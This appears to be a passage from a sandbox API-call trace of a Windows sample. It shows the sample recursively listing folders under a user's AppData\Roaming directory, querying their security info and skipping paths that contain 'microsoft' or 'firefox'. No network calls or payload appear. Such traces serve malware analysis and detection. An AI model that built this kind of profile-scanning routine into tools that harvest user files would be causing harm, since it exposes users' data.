[0083.579] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*", lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 0x586be0 [0083.579] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 1 [0083.579] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 0 [0083.579] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.579] Sleep (dwMilliseconds=0x0) [0083.579] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0 [0083.579] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.579] Sleep (dwMilliseconds=0x0) [0083.580] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.580] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="Headlights" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights" [0083.580] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights") returned 1 [0083.580] GetNamedSecurityInfoW () returned 0x0 [0083.580] LocalFree (hMem=0x571fe8) returned 0x0 [0083.580] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights", lpSrch="microsoft") returned 0x0 [0083.580] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights", lpSrch="firefox") returned 0x0 [0083.580] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights\\*" [0083.580] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights\\*", lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0x586ba0 [0083.580] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.580] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0 [0083.580] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.580] Sleep (dwMilliseconds=0x0) [0083.581] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.581] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="Linguistics" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics" [0083.581] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics") returned 0 [0083.581] GetNamedSecurityInfoW () returned 0x0 [0083.581] LocalFree (hMem=0x572028) returned 0x0 [0083.581] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics", lpSrch="microsoft") returned 0x0 [0083.581] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics", lpSrch="firefox") returned 0x0 [0083.581] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\*" [0083.581] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\*", lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0x586ba0 [0083.581] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.581] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.581] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics", pszFile="Dictionaries" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries" [0083.581] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries") returned 1 [0083.582] GetNamedSecurityInfoW () returned 0x0 [0083.582] LocalFree (hMem=0x571fe8) returned 0x0 [0083.582] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries", lpSrch="microsoft") returned 0x0 [0083.582] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries", lpSrch="firefox") returned 0x0 [0083.582] PathCombineW (in: pszDest=0x18d530, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\*" [0083.582] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\*", lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 0x586be0 [0083.582] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 1 [0083.582] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 0 [0083.582] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.582] Sleep (dwMilliseconds=0x0) [0083.583] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0 [0083.583] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.583] Sleep (dwMilliseconds=0x0) [0083.583] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.583] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="LogTransport2" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2" [0083.583] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2") returned 1 [0083.583] GetNamedSecurityInfoW () returned 0x0 [0083.583] LocalFree (hMem=0x572028) returned 0x0 [0083.583] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2", lpSrch="microsoft") returned 0x0 [0083.584] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2", lpSrch="firefox") returned 0x0 [0083.584] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2\\*" [0083.584] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2\\*", lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0x586ba0 [0083.584] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.584] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0 [0083.584] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.584] Sleep (dwMilliseconds=0x0) [0083.584] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 0 [0083.584] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.584] Sleep (dwMilliseconds=0x0) [0083.585] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.585] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.585] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.585] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.585] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.585] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.585] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.585] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.585] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.585] PathCombineW (in: pszDest=0x18e298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Identities" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities" [0083.585] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities") returned 0 [0083.585] GetNamedSecurityInfoW () returned 0x0 [0083.585] LocalFree (hMem=0x571fe8) returned 0x0 [0083.585] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities", lpSrch="microsoft") returned 0x0 [0083.585] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities", lpSrch="firefox") returned 0x0 [0083.585] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\*" [0083.585] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\*", lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 0x586b60 [0083.585] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.585] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.585] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities", pszFile="{31810C36-5D23-4CCE-A3B4-316DED195C38}" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}" [0083.585] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}") returned 1 [0083.585] GetNamedSecurityInfoW () returned 0x0 [0083.586] LocalFree (hMem=0x572028) returned 0x0 [0083.586] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpSrch="microsoft") returned 0x0 [0083.586] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpSrch="firefox") returned 0x0 [0083.586] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*" [0083.586] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*", lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0x586ba0 [0083.586] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.586] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0 [0083.586] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.586] Sleep (dwMilliseconds=0x0) [0083.586] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 0 [0083.586] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.586] Sleep (dwMilliseconds=0x0) [0083.587] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.587] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.587] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.587] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.587] PathCombineW (in: pszDest=0x18e298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Macromedia" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia" [0083.587] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia") returned 0 [0083.587] GetNamedSecurityInfoW () returned 0x0 [0083.587] LocalFree (hMem=0x571fe8) returned 0x0 [0083.587] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia", lpSrch="microsoft") returned 0x0 [0083.587] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia", lpSrch="firefox") returned 0x0 [0083.587] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\*" [0083.587] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\*", lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 0x586b60 [0083.587] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.587] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.587] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia", pszFile="Flash Player" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player" [0083.587] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player") returned 0 [0083.587] GetNamedSecurityInfoW () returned 0x0 [0083.588] LocalFree (hMem=0x572028) returned 0x0 [0083.588] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player", lpSrch="microsoft") returned 0x0 [0083.588] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player", lpSrch="firefox") returned 0x0 [0083.588] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\*" [0083.588] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\*", lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0x586ba0 [0083.588] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.588] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.588] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player", pszFile="macromedia.com" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com" [0083.588] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com") returned 0 [0083.588] GetNamedSecurityInfoW () returned 0x0 [0083.588] LocalFree (hMem=0x571fe8) returned 0x0 [0083.588] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", lpSrch="microsoft") returned 0x0 [0083.588] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", lpSrch="firefox") returned 0x0 [0083.588] PathCombineW (in: pszDest=0x18d530, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*" [0083.588] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*", lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 0x586be0 [0083.588] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 1 [0083.588] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 1 [0083.588] PathCombineW (in: pszDest=0x18d530, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", pszFile="support" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support" [0083.588] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support") returned 0 [0083.588] GetNamedSecurityInfoW () returned 0x0 [0083.589] LocalFree (hMem=0x572028) returned 0x0 [0083.589] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", lpSrch="microsoft") returned 0x0 [0083.589] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", lpSrch="firefox") returned 0x0 [0083.589] PathCombineW (in: pszDest=0x18d0b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*" [0083.589] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*", lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 0x586c20 [0083.589] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 1 [0083.589] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 1 [0083.589] PathCombineW (in: pszDest=0x18d0b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", pszFile="flashplayer" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer" [0083.589] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer") returned 0 [0083.589] GetNamedSecurityInfoW () returned 0x0 [0083.589] LocalFree (hMem=0x571fe8) returned 0x0 [0083.589] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", lpSrch="microsoft") returned 0x0 [0083.589] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", lpSrch="firefox") returned 0x0 [0083.589] PathCombineW (in: pszDest=0x18cc40, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*" [0083.589] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*", lpFindFileData=0x18ce48 | out: lpFindFileData=0x18ce48) returned 0x586c60 [0083.589] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18ce48 | out: lpFindFileData=0x18ce48) returned 1 [0083.589] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18ce48 | out: lpFindFileData=0x18ce48) returned 1 [0083.589] PathCombineW (in: pszDest=0x18cc40, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", pszFile="sys" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" [0083.589] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 0 [0083.589] GetNamedSecurityInfoW () returned 0x0 [0083.590] LocalFree (hMem=0x572028) returned 0x0 [0083.590] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys", lpSrch="microsoft") returned 0x0 [0083.590] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys", lpSrch="firefox") returned 0x0 [0083.590] PathCombineW (in: pszDest=0x18c7c8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*" [0083.590] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*", lpFindFileData=0x18c9d0 | out: lpFindFileData=0x18c9d0) returned 0x586ca0 [0083.590] FindNextFileW (in: hFindFile=0x586ca0, lpFindFileData=0x18c9d0 | out: lpFindFileData=0x18c9d0) returned 1 [0083.590] FindNextFileW (in: hFindFile=0x586ca0, lpFindFileData=0x18c9d0 | out: lpFindFileData=0x18c9d0) returned 1 [0083.590] FindNextFileW (in: hFindFile=0x586ca0, lpFindFileData=0x18c9d0 | out: lpFindFileData=0x18c9d0) returned 1 [0083.590] FindNextFileW (in: hFindFile=0x586ca0, lpFindFileData=0x18c9d0 | out: lpFindFileData=0x18c9d0) returned 1 [0083.590] FindNextFileW (in: hFindFile=0x586ca0, lpFindFileData=0x18c9d0 | out: lpFindFileData=0x18c9d0) returned 1 [0083.590] FindNextFileW (in: hFindFile=0x586ca0, lpFindFileData=0x18c9d0 | out: lpFindFileData=0x18c9d0) returned 0 [0083.590] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.590] Sleep (dwMilliseconds=0x0) [0083.590] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18ce48 | out: lpFindFileData=0x18ce48) returned 0 [0083.590] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.590] Sleep (dwMilliseconds=0x0) [0083.591] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 0 [0083.591] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.591] Sleep (dwMilliseconds=0x0) [0083.591] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 0 [0083.591] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.591] Sleep (dwMilliseconds=0x0) [0083.591] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0 [0083.591] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.592] Sleep (dwMilliseconds=0x0) [0083.592] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 0 [0083.593] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.593] Sleep (dwMilliseconds=0x0) [0083.593] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.593] PathCombineW (in: pszDest=0x18e298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Microsoft" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft" [0083.593] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft") returned 0 [0083.593] GetNamedSecurityInfoW () returned 0x0 [0083.593] LocalFree (hMem=0x571fe8) returned 0x0 [0083.593] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", lpSrch="microsoft") returned="Microsoft" [0083.593] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", lpSrch="firefox") returned 0x0 [0083.593] Sleep (dwMilliseconds=0x0) [0083.596] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.596] 